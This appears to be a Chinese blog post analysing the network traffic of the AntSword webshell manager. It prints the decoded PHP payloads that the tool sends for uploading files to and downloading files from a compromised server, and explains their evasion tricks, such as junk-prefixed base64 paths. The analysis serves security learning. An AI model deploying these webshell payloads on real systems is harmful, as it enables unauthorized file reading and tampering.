介绍
蚁剑(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。通过分析这些开源的渗透神器的流量,学习其中的编写思想,可以帮助我到以后的渗透道路。
进入流量分析
今天主要看看蚁剑的文件的上传和下载的流量
1. 首先蚁剑设置代理以后抓包,文件上传,放到decode模块解码
解码2. 解完码以后放到phpstorm开始审计
审计3. 完整代码如下:
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{
return $out;
}
;
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "edc1896f";
echo @asenc($output);
echo "6e3af";
}
$f8a20340da4868 = 'yjQzovcGhwU3R1ZHkvV1dXL3RyYWNlLjc3NTY5MDc2Lnh0';
$p59b27f32963f6 = '5452414345205354415254205B323032322D31302D32362030333A33363A33345D0A20202020302E3030353020202020203133343536302020202D3E207B6D61696E7D282920433A5C70687053747564795C5757575C5250434D535C696E6465782E7068703A300A20202020302E30303630202020202031333436323420202020202D3E206572726F725F7265706F7274696E67286C6F6E672920433A5C70687053747564795C5757575C5250434D535C696E6465782E7068703A31310A20202020302E3030363020202020203133343838302020202020203E3D3E2033323736370A20202020302E30303630202020202031333437393220202020202D3E20646174655F64656661756C745F74696D657A6F6E655F73657428737472696E672833292920433A5C70687053747564795C5757575C5250434D535C696E6465782E7068703A31320A20202020302E3030363020202020203133343830382020202020203E3D3E20545255450A20202020302E30303630202020202031333438303820202020202D3E20646566696E656428737472696E672837292920433A5C70687053747564795C5757575C5250434D535C696E6465782E7068703A31330A20202020302E3030363020202020203133343830382020202020203E3D3E2046414C53450A20202020302E30303630202020202031333438343820202020202D3E206469726E616D6528737472696E67283331292920433A5C70687053747564795C5757575C5250434D535C696E6465782E7068703A31330A20202020302E3030363020202020203133343838382020202020203E3D3E2027433A5C5C70687053747564795C5C5757575C5C5250434D53270A20202020302E30303630202020202031333438383820202020202D3E20646566696E6528737472696E672837292C20737472696E67283231292920433A5C70687053747564795C5757575C5250434D535C696E6465782E7068703A31330A20202020302E3030363020202020203133343932302020202020203E3D3E20545255450A20202020302E30303630202020202031333438343020202020202D3E20646566696E656428737472696E672837292920433A5C70687053747564795C5757575C5250434D535C696E6465782E7068703A31340A20202020302E3030363020202020203133343834302020202020203E3D3E2046414C53450A20202020302E30303630202020202031333439313220202020202D3E20646566696E6528737472696E672837292C20737472696E67283238292920433A5C70687053747564795C5757575C5250434D535C696E6465782E';
ob_start();
try {
$f = base64_decode(substr($f8a20340da4868, 2));
$c = $p59b27f32963f6;
$c = str_replace("
", "", $c);
$c = str_replace("
", "", $c);
$buf = "";
for ($i = 0; $i < strlen($c); $i += 2) $buf .= urldecode("%" . substr($c, $i, 2));
echo(@fwrite(fopen($f, "a"), $buf) ? "1" : "0");;
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
4. 经过DEBUG发现
(1)蚁剑通过post传两个参数,一个是文件的上传路径,一个是文件内容。
(2)其中文件路径通过base64编码传输,数据最前面加两个无意义字符混淆。
(3)文件内容通过url编码上传且去掉%。
(4)当参数成功获取时,通过for循环以两个字符长度取值解码文件内容。
(5)将文件内容解码拼接后复制给变量$buf,最后通过fopen函数追加写打开文件,用fwrite函数将内容写入
调试接下来下载部分
1. 同样抓包解码进入调试
调试2. 完整代码如下
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{
return $out;
}
;
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "8593e78c";
echo @asenc($output);
echo "3471a";
}
$oe0c7b4e335b8e = 'zXQzovcGhwU3R1ZHkvV1dXLzEudHh0';
ob_start();
try {
$F = base64_decode(substr(get_magic_quotes_gpc() ? stripslashes($oe0c7b4e335b8e) : $oe0c7b4e335b8e, 2));
$fp = @fopen($F, "r");
if (@fgetc($fp)) {
@fclose($fp);
@readfile($F);
} else {
echo("ERROR:// Can Not Read");
};
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
3. 经过DEBUG发现
(1)下载文件流程为: 将要下载的文件名通过post用base64加密传输,且前两位字符为无意义符用于混淆安全软件。
(2)使用fopen函数打开文件,用fgetc从文件中读取一个字符,如果读取到就读取文件内容到缓冲区并关闭文件。
debug(3)最后返回缓冲区中的数据由蚁剑接收保存到本机。
返回存储